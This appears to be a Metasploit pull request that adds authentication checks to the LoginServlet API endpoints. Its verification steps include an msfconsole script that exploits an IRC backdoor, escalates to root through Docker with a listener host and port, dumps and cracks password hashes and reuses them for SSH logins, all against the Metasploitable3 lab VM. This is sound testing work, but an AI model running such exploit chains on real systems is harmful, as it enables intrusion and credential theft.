### PR TITLE
Fix to add LoginServlet authentication

### DIFF
--- a/documentation/api/v1/login_api_doc.rb
+++ b/documentation/api/v1/login_api_doc.rb
@@ -153,7 +153,7 @@ module LoginApiDoc
   end
 
   swagger_path '/api/v1/logins/{id}' do
-    # Swagger documentation for api/v1/logins/:id GET
+    # Swagger documentation for /api/v1/logins/:id GET
     operation :get do
       key :description, 'Return specific login that is stored in the database.'
       key :tags, [ 'login' ]

--- a/lib/msf/core/web_services/servlet/login_servlet.rb
+++ b/lib/msf/core/web_services/servlet/login_servlet.rb
@@ -21,6 +21,7 @@ module LoginServlet
 
   def self.get_logins
     lambda {
+      warden.authenticate!
       begin
         sanitized_params = sanitize_params(params, env['rack.request.query_hash'])
         data = get_db.logins(sanitized_params)
@@ -34,6 +35,7 @@ module LoginServlet
 
   def self.create_login
     lambda {
+      warden.authenticate!
       begin
         opts = parse_json_request(request, false)
         opts[:core][:workspace] = get_db.workspaces(id: opts[:workspace_id]).first
@@ -48,6 +50,7 @@ module LoginServlet
 
   def self.update_login
     lambda {
+      warden.authenticate!
       begin
         opts = parse_json_request(request, false)
         tmp_params = sanitize_params(params)
@@ -62,6 +65,7 @@ module LoginServlet
 
   def self.delete_logins
     lambda {
+      warden.authenticate!
       begin
         opts = parse_json_request(request, false)
         data = get_db.delete_logins(opts)


### PR DESCRIPTION
The `LoginServlet` currently does not require authentication. This fix adds authentication to the `LoginServlet` endpoints introduced in #10176.

Get hosts or other models without authentication and note the error message:
```
$ curl -k -X GET -H "accept: application/json" "https://localhost:8080/api/v1/hosts" | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    72  100    72    0     0   4500      0 --:--:-- --:--:-- --:--:--  4800
{
    "error": {
        "code": 401,
        "message": "Authenticate to access this resource."
    }
}
```

Get logins without authentication and a response is returned rather than an authentication error:
Note, the response is empty because there are no logins in the database.
```
$ curl -k -X GET -H "accept: application/json" "https://localhost:8080/api/v1/logins" | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     2  100     2    0     0    142      0 --:--:-- --:--:-- --:--:--   142
[]
```

Ticket: MS-3699

## Verification

Note, the verification steps are mostly duplicated from #10176.

### Test login modules

The following steps will create and update login records.

- [x] Set up [Metasploitable3](https://github.com/rapid7/metasploitable3) VM for testing
- [x] Start `msfconsole`
- [x] Create one or more valid credentials for Metasploitable3, for example, `creds add user:vagrant password:vagrant`
- [x] Test a successful login against a service
  - [x] `use auxiliary/scanner/ssh/ssh_login`
  - [x] `set RHOSTS <IP address of Metasploitable3>`
  - [x] `set DB_ALL_CREDS true` to use the credential pairs stored in the database. Ensure valid credentials are displayed when running the `creds` command.
  - [x] `run`
  - [x] **Verify** the login attempt is displayed for the credential by running the `creds` command.
- [x] Test that logins are updated properly
  - [x] `use auxiliary/scanner/ssh/ssh_login`
  - [x] `set RHOSTS <IP address of Metasploitable3>`
  - [x] `set DB_ALL_CREDS true` to use the credential pairs stored in the database. Ensure invalid credentials are displayed when running the `creds` command.
  - [x] `run`
  - [x] **Verify** the login attempt is displayed for the credential by running the `creds` command.
  - [x] Turn off Metasploitable3 and `run` the module again to get a failed attempt.
  - [x] Verify the login attempt displays for the credential. You may need to use the API for this because it is not displayed in the UI. I recommend using the GET command under Logins at `http://localhost:8080/api/v1/api-docs`. The login record should show a `status` of `Unable to connect`

### Test JTR modules

The following steps will create and update login records.

- [x] Create the following RC script:
```
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST <IP address of Metasploitable3>
set RPORT 6697
exploit -z
sleep 5
sessions -u 1
sleep 5
use exploit/linux/local/docker_daemon_privilege_escalation
set SESSION 2
set LHOST <IP of listening address>
set LPORT 4445
exploit
```
- [x] Set up [Metasploitable3](https://github.com/rapid7/metasploitable3) VM for testing
- [x] Start `msfconsole`
- [x] Run the RC script `resource <RC Script Name>.rc`
- [x] Verify you get a root shell and then background it
- [x] Gather Dump Password Hashes
  - [x] `use post/linux/gather/hashdump`
  - [x] `set SESSION <root session ID>`
  - [x] `run`
- [x] Crack the hashes using John the Ripper Linux Password Cracker
  - [x] `use auxiliary/analyze/jtr_linux`
  - [x] Create a custom wordlist with at least `Pr0t0c07`
  - [x] `set CUSTOM_WORDLIST <wordlist file name>`
  - [x] `set USE_DEFAULT_WORDLIST false`
  - [x] `set USE_ROOT_WORDS false`
  - [x] `run` - this should successfully crack the `c_three_pio` hash
- [x] **Verify** the cracked creds are present when you run the `creds` command
- [x] Test successful logins against a service using the newly cracked creds
  - [x] `use auxiliary/scanner/ssh/ssh_login`
  - [x] `set RHOSTS <IP address of Metasploitable3>`
  - [x] `set DB_ALL_CREDS true` to use the credential pairs stored in the database.
  - [x] `run`
  - [x] **Verify** the login attempts are displayed for the credentials by running the `creds` command.

### Verify the content in the API docs
- [x] **Verify** unauthenticated access to the Logins endpoints using the Swagger UI respond appropriately
- [x] **Verify** the Logins endpoints using the Swagger UI to ensure they are working correctly
